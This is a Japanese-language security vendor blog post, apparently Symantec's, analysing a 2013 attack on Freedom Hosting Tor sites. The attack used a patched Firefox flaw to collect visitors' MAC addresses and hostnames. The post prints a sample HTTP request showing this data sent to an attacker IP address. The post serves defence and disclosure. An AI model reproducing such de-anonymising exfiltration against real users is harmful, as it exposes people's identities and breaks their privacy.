Tor ??????????
8 月 4 日、Freedom Hosting(Tor ネットワークを介して匿名ホスティングサービスを提供するサービスプロバイダ)が運用する Web サイトで、不正なスクリプトのホスティングが見つかりました。これは、Freedom Hosting の代表と見られる人物の引き渡しを米国当局が要請したことに関する、8 月 3 日のメディアレポートに続くものです。
見つかったスクリプトは、Firefox の脆弱性を悪用します(この脆弱性はすでに Firefox 22 と Firefox ESR 17.0.7 で修正済みです)。この脆弱性が選ばれた理由は、Tor Browser Bundle(TBB)が Firefox ESR-17 をベースにしているためと思われます。シマンテックでは、これらのスクリプトを Trojan.Malscript!html として検出しています。
図: 攻撃のプロセス
攻撃者は侵入に成功すると、当該コンピュータからネットワークカードの固有 MAC アドレスとローカルホスト名を取得し、そのデータを IP 65.222.202.54 に返送します。返送されるデータの例を以下に示します。Host はローカルコンピュータ名を表し、Cookie ID は実際には MAC アドレスを表しています。
GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1
Host: PXE306141
Cookie: ID=0019B909D908
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip
また、Web サイトを訪れた後に、システム上に独特な Cookie も残されます。攻撃者は固有 MAC アドレス、ローカルコンピュータ名と Cookie を使って、攻撃対象のシステムを特定します。これらの手法が法執行によって使われたならば、ネットワークカードの購入者を追跡してシステムを特定することが可能でしょう。誰がこれを行っているのかとその理由については様々な憶測が飛び交っていますが、現時点ではまだ何も確認されていません。
Tor ネットワークは個人のプライバシーを尊重し、ユーザーの場所や利用状況をトラフィック分析やネットワーク監視から隠すように設計されていますが、この攻撃手法によって、Tor ネットワークの利用者を特定できることが明らかになりました。
* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/ja にアクセスしてください。